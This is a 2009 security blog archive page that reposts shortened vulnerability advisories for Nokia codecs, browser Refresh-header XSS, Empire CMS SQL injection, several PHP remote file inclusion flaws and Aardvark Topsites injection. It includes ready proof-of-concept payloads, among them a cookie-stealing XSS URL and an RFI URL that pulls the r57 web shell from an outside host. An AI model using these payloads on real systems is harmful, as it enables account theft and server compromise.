Entries archive - Think Bad
Welcome GuestFriday, 2010-03-19, 11:27 PM

Thing secure will make you more carefull


Main » Entries archive
SEC Consult Security Advisory < 20090707-0 >
==============================
============================================
             title: Symbian S60 / Nokia firmware media codecs
                    multiple memory corruption vulnerabilities
 vulnerable version: All Nokia smartphones with multimedia capabilities
                    are likely vulnerable (tested on E61, E71, N96)
            impact: Critical
          homepage: http://www.nokia.com/
             found: May 2009
                by: Bernhard Mueller / SEC Consult Vulnerability Lab
==============================... Read more »
Views: 48 | Added by: apeh1706 | Date: 2009-07-09 | Comments (0)

Originaly posting by Bernhard Mueller to Bugtraq

I'll just leave this here ;)

https://www.sec-consult.com/files/SEC_Consult_Vulnerability_Lab_Pwning_Symbian_V1.03_PUBLIC.pdf

Abstract:

1. Perform static analysis of XIP ROM images (dumping, restoring import
and export tables, searching for unsafe function calls)
2. Enable run mode debugging of system binaries running from ROM, by
cracking the AppTRK debug agent
3. (Ab-)use the AppTRK debug agent as a foundation for dynamic
vulnerability analysis
3. Build an exemplary file fuzzer for the video- and audio codecs
shipped with current Nokia smartphones
4. List and briefly analyze the identified bugs
5.... Read more »
Views: 51 | Added by: apeh1706 | Date: 2009-07-07 | Comments (0)

I want to warn you about Cross-Site Scripting vulnerabilities in Mozilla,
Internet Explorer, Opera and Chrome. I wrote about it at my site this Monday
(29.06.2009) and also informed corresponding browsers developers about this
vulnerability.

At 21.04.2009 there was fixed vulnerability in Firefox 3.0.9
(http://www.mozilla.org/security/announce/2009/mfsa2009-22.html), which
allowed to conduct XSS attacks via Refresh header. And as I checked, this
attack is also working in Mozilla, IE6, Opera and Chrome.

XSS:

With request to script at web site:

http://site/script.php?param=javascript:alert(document.cookie)

Which returns in answer the refresh header:

refresh: 0; URL=javascript:alert(doc... Read more »
Views: 43 | Added by: apeh1706 | Date: 2009-07-05 | Comments (0)

######################### Securitylab.ir ########################
# Application Info:
# Name: Empire Cms
# Version: 5.1
# Download: http://www.phome.net/OpenSource/download/EmpireCMS_5.1os_SC_GBK.zip
##############################
###################################
# Discoverd By: Securitylab.ir
# Website: http://Securitylab.ir
# Contacts: admin[at]securitylab.ir & k4mr4n_st@yahoo.com
#################################################################
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
#===========================================================
# ... Read more »
Views: 62 | Added by: apeh1706 | Date: 2009-07-02 | Comments (0)

I want to ssh hop from A to B to C in a way were only B has the
key and configuration for C:

+---------------+   +---------------+   +---+
| A (key for B) |---| B (key for C) |---| C |
+---------------+   +---------------+   +---+

A (ssh): OpenSSH_5.2p1, OpenSSL 0.9.8k 25 Mar 2009
B (ssh): OpenSSH_5.2p1, OpenSSL 0.9.8k 25 Mar 2009
C (sshd): OpenSSH_5.2p1, OpenSSL 0.9.8k 25 Mar 2009

So far, shell connections work fine, i just type the following to obtain
shell access on C:

me@A $ ssh B -t ssh C
me@C $

The problem now is, that i'd like to use scp, rsync etc. through ssh.
So i need a transparent way integrated into ssh:

me@A $ rsync foo C:

But whatever ProxyCommand i use in my .ssh/config on A for Host C,
A wants to authenticate with C which can't be done because A does not
have credentials for C.

Thanks in advance,

--
Miers... Read more »
Views: 58 | Added by: apeh1706 | Date: 2009-06-30 | Comments (0)

   |
  |  [o] AjaxPortal v3.0 Remote File Inclusion Vulnerability       |
 
|   |
  |       Software : AjaxPortal v3.0       |
  |       Vendor   : http://myiosoft.com/download/AjaxPortal/ajaxportal-30.zip                    |
  |       Author   : Cru3l.b0y           |
  |       Contact  : Cru3l.b0y@deltahacking.net        |
  |   Home     : WwW.DeltaHacking.Net
 
  |   |
  |  [o] Vulnerable file   |
  |     |
  |       install/di.php  ... Read more »
Views: 64 | Added by: apeh1706 | Date: 2009-06-30 | Comments (0)

##############################
###################################################################################
[+] Mega File Manager 1.0 (index.php page) Remote File Inclusion Vulnerability
[+] Discovered By xhackerx
[+] http://www.c99.mobi
#################################################################################################################

[+] Homepage : http://www.awesomephp.com/?MegaFileManager

[+] Note : The script is full of RFI vulns,but I am tired to
make querys now.

[+] Local File Inclusion

   http://127.0.0.1/[path]/index.php?ROOT_SERVER=http://www.c99.mobi/r57.txt?


+ if you need she... Read more »
Views: 47 | Added by: apeh1706 | Date: 2009-06-30 | Comments (0)


this is my friend's first e book said that "this is my first e-book" this e-book is talk about windows parental control.... for you that want to know how to control it. i want you to read this book first before you go on the rock....muahahahha
windows 7 parent control
this e-book is so great

check this link

http://mugi.or.id/media/p/2575.aspx
Views: 62 | Added by: apeh1706 | Date: 2009-06-28 | Comments (0)

Hi,

Here's the vulnerabilities descriptions and POCs:
##############################
###

I write to report three vulnerabilities that I found in the last version of Aardvark Topsites PHP(5.2.1) and older versions.

The cause of all of them is the incorrect verification of input parameters.


Here are the vulnerabilities:
==================

HTML Injection (up to 5.2.0)
--------------------------

For example, is possible to inject a link to any URL with any anchor text.

POC: /index.php?a=search&q=psstt+security”><a+href%3Dhttp%3A%2F%2Fwebsec.id3as.com>Web-Application-Security


Information Disclosure 1 (up to 5.2.1)
--------------------------

Disclosure of full path of the application sources when you put a negative number at the ’start’ parameter.

POC: /index.ph... Read more »
Views: 40 | Added by: apeh1706 | Date: 2009-06-27 | Comments (0)

« 1 2 ... 14 15 16 17 18 ... 20 21 »
Login form
Login:
Password:
Block title
Search
Calendar
«  March 2010  »
SuMoTuWeThFrSa
 123456
78910111213
14151617181920
21222324252627
28293031
Entries archive
Site friends
  • By0urs3lf Site
  • Jasakom
  • Ikan_Teri's Site
  • Security Focus Site
  • Kang Dedy's Site
  • Kimmonosz
  • Statistics

    Total online: 1
    Guests: 1
    Users: 0